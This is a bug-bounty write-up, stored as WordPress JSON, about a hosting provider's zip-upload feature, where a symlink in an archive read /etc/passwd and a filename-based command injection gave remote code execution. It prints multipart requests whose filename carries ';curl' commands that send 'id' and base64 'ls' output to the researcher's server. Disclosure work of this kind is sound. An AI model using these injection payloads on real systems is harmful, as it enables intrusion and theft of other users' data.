{"id":544,"date":"2025-12-23T13:57:56","date_gmt":"2025-12-23T12:57:56","guid":{"rendered":"https:\/\/bergee.it\/blog\/?p=544"},"modified":"2025-12-30T06:42:58","modified_gmt":"2025-12-30T05:42:58","slug":"two-crits-one-zip","status":"publish","type":"post","link":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/","title":{"rendered":"Two crits, one zip"},"content":{"rendered":"

Ho,ho, ho Merry Christmas everyone \ud83d\ude42<\/p>\n

Xmas is coming, and I am bringing the write-up on the RCE I found in\u00a0 Zip upload functionality.<\/p>\n

I tested the company that sells domains and hosting. One of the hosting type is simple static hosting, which allows uploading zip files, and this zip file is automatically extracted in the website directory. There is also the simple content editor, where you can create\/ delete \/update\/ view files and folders. So, first thing to get there, I needed to buy a domain name. The first thing that came to mind was a path traversal attack. In short, when you upload zip file with a file named like this “..\/..\/..\/etc\/passwd”,\u00a0 when extracted, the extraction will take place in a different directory than expected, and this way you have arbitrary file write. Well, not this time. The app had protections against that and didn’t allow uploading zip files with such filenames inside.<\/p>\n

I moved on and tried the second attack – the symbolic link attack – I created a symlink inside the zipfile, pointing to \/etc\/passwd, and after extraction, I saw the content of \/etc\/passwd – classified and paid as P1 (750 USD).\u00a0 Here<\/a> is the full write-up.<\/p>\n

\"\"<\/p>\n

I stopped testing this app and focused on other PHP apps where I also started searching for symlink attack vulnerabilities, and I found some, but… the content of the file was jus the text “\/etc\/passwd”. I could not understand this. As I read a bit more about PHP zipfile handling, it was clear that by default, PHP libraries responsible for zipfile extraction don’t extract the content of symlinks, just the name.<\/p>\n

I thought, although the app is written in PHP, there must be some other way of extracting the zip files. Maybe using the simple unzip() system command. That would extract the content of the file pointed to by the symlink. The request was like:<\/p>\n

\n
POST \/upload\u00a0 HTTP\/2\r\nHost:\u00a0redacted.com\r\n\r\n------geckoformboundaryb54159f597a93c748c82fe2e06880ce0\r\nContent-Disposition: form-data; name=\"domain\"\r\n\r\nmywebsite.com\r\n------geckoformboundaryb54159f597a93c748c82fe2e06880ce0\r\nContent-Disposition: form-data; name=\"myfile\"; filename=\"hello.zip\"<\/b>\r\nContent-Type: application\/x-zip-compressed<\/pre>\n<\/blockquote>\n
 <\/p>\n
What if the unzip command is executed by system(), exec() or something similar? If so, maybe it is vulnerable to command injection and in the end, RCE. I run a simple HTTP server via php -S 0:8888 on my VPS and tried:<\/p>\n
\n
Content-Disposition: form-data; name=\"myfile\"; filename=\"hello.zip\";curl -s myserver:8888?a=$(id)<\/b><\/pre>\n<\/blockquote>\n
I immediately saw the request with the output of the id command. Yeah, I had command inject and RCE.<\/p>\n
\"\"<\/p>\n
I reported it, and after some time, the response was:<\/p>\n
“We consider this a self-attack. Users on the new static hosting instance are caged using CageFS, so the only commands you would be able to run are ones that affect your own user”<\/i><\/p>\n
Wait, wait? I was surprised and disappointed at the same time. Self-RCE. That was something new. Ok, I decided to dig deeper :).<\/p>\n
First thought was to read about CageFS and try to escape the cage. Before that, however, I decided to look around the file system. I used these requests:<\/p>\n
\n
POST \/upload HTTP\/2\r\nContent-Disposition: form-data; name=\"myfile\"; filename=\"test.zip;curl -s\u00a0myserver8888?cmd=$(ls |base64 -w 0)\"\r\n<\/pre>\n<\/blockquote>\n
The output was formatted as a base64 string of the cmd parameter. After a while, I found an archive directory with archived content of other users’ domains. I quickly found out I could read other users’ data, secrets, and the whole archived content. I reported that, and this was immediately classified and paid as P1 (sensitive data exposure) – another 750 USD. Now I was happy with the result.<\/p>\n
\"\"<\/p>\n
Apart from that, I found some app source code hidden in another place.<\/p>\n
\"\"<\/p>\n
Impact: 2 x Critical
\nBounty: 2 x 750 USD<\/p>\n
See you next bug<\/p>\n","protected":false},"excerpt":{"rendered":"
Ho,ho, ho Merry Christmas everyone \ud83d\ude42 Xmas is coming, and I am bringing the write-up on the RCE I found in\u00a0 Zip upload functionality. I tested the company that sells domains and hosting. One of the hosting type is simple static hosting, which allows uploading zip files, and this zip file is automatically extracted in…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[32,48,30,29,47],"tags":[],"class_list":["post-544","post","type-post","status-publish","format-standard","hentry","category-bug-bounty","category-rce","category-tutorial","category-write-up","category-zip-symlink"],"yoast_head":"\nTwo crits, one zip - Bergee's Stories on Bug Hunting<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Two crits, one zip - Bergee's Stories on Bug Hunting\" \/>\n<meta property=\"og:description\" content=\"Ho,ho, ho Merry Christmas everyone \ud83d\ude42 Xmas is coming, and I am bringing the write-up on the RCE I found in\u00a0 Zip upload functionality. I tested the company that sells domains and hosting. One of the hosting type is simple static hosting, which allows uploading zip files, and this zip file is automatically extracted in...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\" \/>\n<meta property=\"og:site_name\" content=\"Bergee's Stories on Bug Hunting\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-23T12:57:56+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-30T05:42:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png\" \/>\n\t<meta property=\"og:image:width\" content=\"502\" \/>\n\t<meta property=\"og:image:height\" content=\"119\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"bergee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/bergee\" \/>\n<meta name=\"twitter:site\" content=\"@bergee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"bergee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\"},\"author\":{\"name\":\"bergee\",\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"headline\":\"Two crits, one zip\",\"datePublished\":\"2025-12-23T12:57:56+00:00\",\"dateModified\":\"2025-12-30T05:42:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\"},\"wordCount\":570,\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png\",\"articleSection\":[\"bug bounty\",\"rce\",\"tutorial\",\"write-up\",\"zip symlink\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\",\"url\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\",\"name\":\"Two crits, one zip - Bergee's Stories on Bug Hunting\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png\",\"datePublished\":\"2025-12-23T12:57:56+00:00\",\"dateModified\":\"2025-12-30T05:42:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png\",\"width\":502,\"height\":119},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/bergee.it\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Two crits, one zip\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/bergee.it\/blog\/#website\",\"url\":\"https:\/\/bergee.it\/blog\/\",\"name\":\"Bergee's Stories on Bug Hunting\",\"description\":\"hacking, cyber security and programming\",\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/bergee.it\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\",\"name\":\"bergee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"width\":129,\"height\":150,\"caption\":\"bergee\"},\"logo\":{\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\"},\"sameAs\":[\"http:\/\/localhost\/wordpress\",\"https:\/\/www.linkedin.com\/in\/bartlomiej-bergier\",\"https:\/\/x.com\/https:\/\/twitter.com\/bergee\"],\"url\":\"https:\/\/bergee.it\/blog\/author\/bergee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Two crits, one zip - Bergee's Stories on Bug Hunting","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/","og_locale":"en_US","og_type":"article","og_title":"Two crits, one zip - Bergee's Stories on Bug Hunting","og_description":"Ho,ho, ho Merry Christmas everyone \ud83d\ude42 Xmas is coming, and I am bringing the write-up on the RCE I found in\u00a0 Zip upload functionality. I tested the company that sells domains and hosting. One of the hosting type is simple static hosting, which allows uploading zip files, and this zip file is automatically extracted in...","og_url":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/","og_site_name":"Bergee's Stories on Bug Hunting","article_published_time":"2025-12-23T12:57:56+00:00","article_modified_time":"2025-12-30T05:42:58+00:00","og_image":[{"width":502,"height":119,"url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png","type":"image\/png"}],"author":"bergee","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/bergee","twitter_site":"@bergee","twitter_misc":{"Written by":"bergee","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#article","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/"},"author":{"name":"bergee","@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"headline":"Two crits, one zip","datePublished":"2025-12-23T12:57:56+00:00","dateModified":"2025-12-30T05:42:58+00:00","mainEntityOfPage":{"@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/"},"wordCount":570,"publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"image":{"@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png","articleSection":["bug bounty","rce","tutorial","write-up","zip symlink"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/","url":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/","name":"Two crits, one zip - Bergee's Stories on Bug Hunting","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage"},"image":{"@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png","datePublished":"2025-12-23T12:57:56+00:00","dateModified":"2025-12-30T05:42:58+00:00","breadcrumb":{"@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bergee.it\/blog\/two-crits-one-zip\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#primaryimage","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/09\/redacted_etc_passwd.png","width":502,"height":119},{"@type":"BreadcrumbList","@id":"https:\/\/bergee.it\/blog\/two-crits-one-zip\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bergee.it\/blog\/"},{"@type":"ListItem","position":2,"name":"Two crits, one zip"}]},{"@type":"WebSite","@id":"https:\/\/bergee.it\/blog\/#website","url":"https:\/\/bergee.it\/blog\/","name":"Bergee's Stories on Bug Hunting","description":"hacking, cyber security and programming","publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bergee.it\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73","name":"bergee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","width":129,"height":150,"caption":"bergee"},"logo":{"@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png"},"sameAs":["http:\/\/localhost\/wordpress","https:\/\/www.linkedin.com\/in\/bartlomiej-bergier","https:\/\/x.com\/https:\/\/twitter.com\/bergee"],"url":"https:\/\/bergee.it\/blog\/author\/bergee\/"}]}},"_links":{"self":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/comments?post=544"}],"version-history":[{"count":9,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/544\/revisions"}],"predecessor-version":[{"id":559,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/544\/revisions\/559"}],"wp:attachment":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/media?parent=544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/categories?post=544"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/tags?post=544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}